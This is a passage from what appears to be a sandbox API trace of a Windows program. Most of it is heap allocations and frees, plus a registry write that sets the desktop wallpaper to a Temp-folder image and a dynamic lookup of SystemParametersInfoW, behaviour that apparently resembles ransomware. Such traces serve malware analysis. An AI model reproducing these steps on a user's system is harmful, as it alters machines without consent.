lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0257.309] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0257.386] RegCloseKey (hKey=0x3c0) returned 0x0 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a736b8 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0257.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0257.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0257.387] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0257.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0257.388] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0257.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0257.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0257.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0257.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0257.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0257.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0257.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0257.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0257.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0257.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0257.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0257.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0257.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0257.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0257.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0257.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0257.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0257.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0257.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0257.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0257.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0257.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0257.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0257.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0257.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0257.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0257.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0257.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0257.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0257.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0257.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0257.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0257.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0257.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0257.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0257.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0257.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0257.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0257.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0257.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0257.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0257.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0257.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0257.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0257.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0257.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0257.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0257.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0257.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0257.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0257.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0257.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0257.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0257.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0257.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0257.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0257.399] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0257.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0257.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0257.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0257.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0257.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0257.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0257.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0257.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0257.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0257.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0257.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0257.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0257.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0257.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0257.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0257.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0257.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0257.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0257.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0257.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0257.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0257.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0257.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0257.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0257.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0257.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0257.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0257.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0257.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0257.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0257.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0257.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0257.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0257.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0257.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0257.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0257.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0257.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0257.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0257.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0257.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0257.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0257.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0257.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0257.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0257.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0257.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0257.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0257.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0257.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0257.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0257.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0257.409] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0257.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0257.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0257.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0257.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f71e0 [0257.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f71e0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0257.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0257.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0257.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0257.506] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0257.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0257.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0257.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0257.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0257.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0257.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0257.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0257.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0257.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0257.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 